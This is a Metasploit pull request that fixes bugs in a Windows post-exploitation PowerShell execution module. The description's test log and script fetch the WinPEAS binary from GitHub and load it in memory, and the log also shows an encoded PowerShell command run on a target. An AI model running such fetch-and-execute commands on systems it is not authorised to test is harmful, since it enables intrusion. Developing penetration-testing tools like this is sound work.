### PR TITLE
Remove errant write_log call and swap to the all-in-one psh_exec rath…

### DIFF
--- a/lib/msf/core/post/windows/powershell.rb
+++ b/lib/msf/core/post/windows/powershell.rb
@@ -353,7 +353,8 @@ module Msf
               return out
             end
             ps_output = get_ps_output(cmd_out, eof, datastore['Powershell::Post::timeout'])
-            ps_output = ps_output[/#{start}(.*?)#{stop}/m, 1].strip  #https://stackoverflow.com/a/9661504
+            ps_output = ps_output[/#{start}(.*?)#{stop}/m, 1] #https://stackoverflow.com/a/9661504
+            ps_output = ps_output.strip unless ps_output.nil?
             # Kill off the resulting processes if needed
             if ps_cleanup
               vprint_good "Cleaning up #{running_pids.join(', ')}"

--- a/modules/post/windows/manage/powershell/exec_powershell.rb
+++ b/modules/post/windows/manage/powershell/exec_powershell.rb
@@ -118,6 +118,11 @@ class MetasploitModule < Msf::Post
     # Execute the powershell script
     print_status('Executing the script.')
     cmd_out = psh_exec(script)
+    if cmd_out.nil
+      error_msg = 'Powershell command returned a nil value; this could be because the command timed out.\n'
+      error_msg << 'You may want to increase the Powershell::Post::timeout value and try again.'
+      print_warning(error_msg)
+    end
     print_status(cmd_out.to_s)
 
     # That's it

--- a/modules/post/windows/manage/powershell/exec_powershell.rb
+++ b/modules/post/windows/manage/powershell/exec_powershell.rb
@@ -59,8 +59,7 @@ class MetasploitModule < Msf::Post
       [
         OptString.new('SUBSTITUTIONS', [false, 'Script subs in gsub format - original,sub;original,sub' ]),
         OptBool.new('DELETE', [false, 'Delete file after execution', false ]),
-        OptBool.new('DRY_RUN', [false, 'Only show what would be done', false ]),
-        OptInt.new('TIMEOUT', [false, 'Execution timeout', 15]),
+        OptBool.new('DRY_RUN', [false, 'Only show what would be done', false ])
       ]
     )
   end

--- a/modules/post/windows/manage/powershell/exec_powershell.rb
+++ b/modules/post/windows/manage/powershell/exec_powershell.rb
@@ -118,15 +118,8 @@ class MetasploitModule < Msf::Post
 
     # Execute the powershell script
     print_status('Executing the script.')
-    cmd_out, running_pids, open_channels = execute_script(script, datastore['TIMEOUT'])
-
-    # Write output to log
-    print_status("Logging output to #{log_file}.")
-    write_to_log(cmd_out, log_file, eof)
-
-    # Clean up
-    print_status('Cleaning up residual objects and processes.')
-    clean_up(datastore['SCRIPT'], eof, running_pids, open_channels, env_suffix)
+    cmd_out = psh_exec(script)
+    print_status(cmd_out.to_s)
 
     # That's it
     print_good('Finished!')

--- a/modules/post/windows/manage/powershell/exec_powershell.rb
+++ b/modules/post/windows/manage/powershell/exec_powershell.rb
@@ -80,19 +80,6 @@ class MetasploitModule < Msf::Post
     # Make substitutions in script if needed
     script_in = make_subs(script_in, subs) unless subs.empty?
 
-    # Get target's computer name
-    computer_name = session.sys.config.sysinfo['Computer']
-
-    # Create unique log directory
-    log_dir = ::File.join(Msf::Config.log_directory, 'scripts', computer_name)
-    ::FileUtils.mkdir_p(log_dir)
-
-    # Define log filename
-    script_ext = ::File.extname(datastore['SCRIPT'])
-    script_base = ::File.basename(datastore['SCRIPT'], script_ext)
-    time_stamp = ::Time.now.strftime('%Y%m%d:%H%M%S')
-    log_file = ::File.join(log_dir, "#{script_base}-#{time_stamp}.txt")
-
     # Compress
     print_status('Compressing script contents.')
     compressed_script = compress_script(script_in, eof)

--- a/modules/post/windows/manage/powershell/exec_powershell.rb
+++ b/modules/post/windows/manage/powershell/exec_powershell.rb
@@ -118,8 +118,8 @@ class MetasploitModule < Msf::Post
     # Execute the powershell script
     print_status('Executing the script.')
     cmd_out = psh_exec(script)
-    if cmd_out.nil
-      error_msg = 'Powershell command returned a nil value; this could be because the command timed out.\n'
+    if cmd_out.nil?
+      error_msg = "Powershell command returned a nil value; this could be because the command timed out.\n"
       error_msg << 'You may want to increase the Powershell::Post::timeout value and try again.'
       print_warning(error_msg)
     end


### PR DESCRIPTION
In playing with https://github.com/rapid7/metasploit-framework/pull/20208, I wondered why we did not just run the PowerShell script directly in memory, so I tried it, and it failed:
```
msf post(windows/manage/powershell/exec_powershell) > run
[*] $url = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")


[*] Compressing script contents.
[+] Compressed size: 609
[*] Executing the script.
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEkAdgAyAGcARwBnAEMAQQB5ADEATwBQAFcAdgBEAE0AQgBEAGQALwBTAHUARQA4AEcAQQBQAHQAbgBhAFgARABHAG4ASgBFAEcAaQBwAGkAUwBrAGQAagBDAG0AeQBmAFYASABVADIAaQBkAFYAZAAyAGsAaQA2AEkAJwArACcAKwB2AEQASgAzAGUANAA5ADcASAB2AGQAeAA0AHMAUgBQAHkAdwB1AHkAcABVAGMAcABZAHYAbAB6AEgAZQBuAEsAcgA4AHEAQwBKAEsAagBTAHEAUABlAHkANwBiAGkATQBCAGwAbgB7ADIAfQBEAFUAbwB0AG0ASQBGAGEAegB1ACsASABpADkASwB4AHUARgBqAGUAVAB4AHYAagB7ADMAfQB6AGwAVABEAEgAVwBTAFcAQgArAFoAZAAzADAAVgBpAFcATwBzAFQAbgBCAGUAWQAyAEQAcQBzADkAMABTAHcAagBrAHMAYwBtAHUAWQB7ADEAfQBaAFkAdAArAGoAQQB6ADkATQBCAFIASAAvAEgARgBmAFUATAAzAEQAZQBJAEwAdgBhACsAbwBYAE0AagBkAGUAaQB1AHEATgA0AEYARwBUAG4AVgBvAGQAeQBLAEkAUgB2ADYAJwArACcASwBEAHIAYQAxADYASABUADgAVABpAE8AcAB3ADkAeAByAG4ATgBqAGcAUABnAGEATgA0AGMAJwArACcAcwBpAEEAWABKAFkAUABvAHYAOQBmAFYAaQBmAFIAQgBMADIAbQBwAHkALwBhAFkAaQBGAGwAbQBXAFYALwBLAHYAJwArACcAbQBvAFYAUABzAEEAQQBBAEEAewAwAH0AJwApAC0AZgAnAD0AJwAsACcANQAnACwAJwBRACcALAAnAGgAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApAGUAYwBoAG8AIAAnAHMAbQBzAFoAUQBBAGkAUQAnADsA -InputFormat None
[*] Logging output to /home/tmoose/.msf4/logs/scripts/WIN10_21H2_6CFD/winpeas_load-20250723:094947.txt.
[-] Post failed: NoMethodError undefined method `write_to_log' for #<Module:post/windows/manage/powershell/exec_powershell datastore=[#
...

```

I pulled the `write_to_log` out and replaced the call to `execute_script` with `psh_exec` since that method seemed to do everything automagically.
If anyone knows where the `write_to_log` method went  or a better way to get `execute_sccript` to work.

The script I used for testing was WinPEASS:
```
moose@ubuntu-dev2024:~$ cat winpeas_load.ps1 
$url = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

```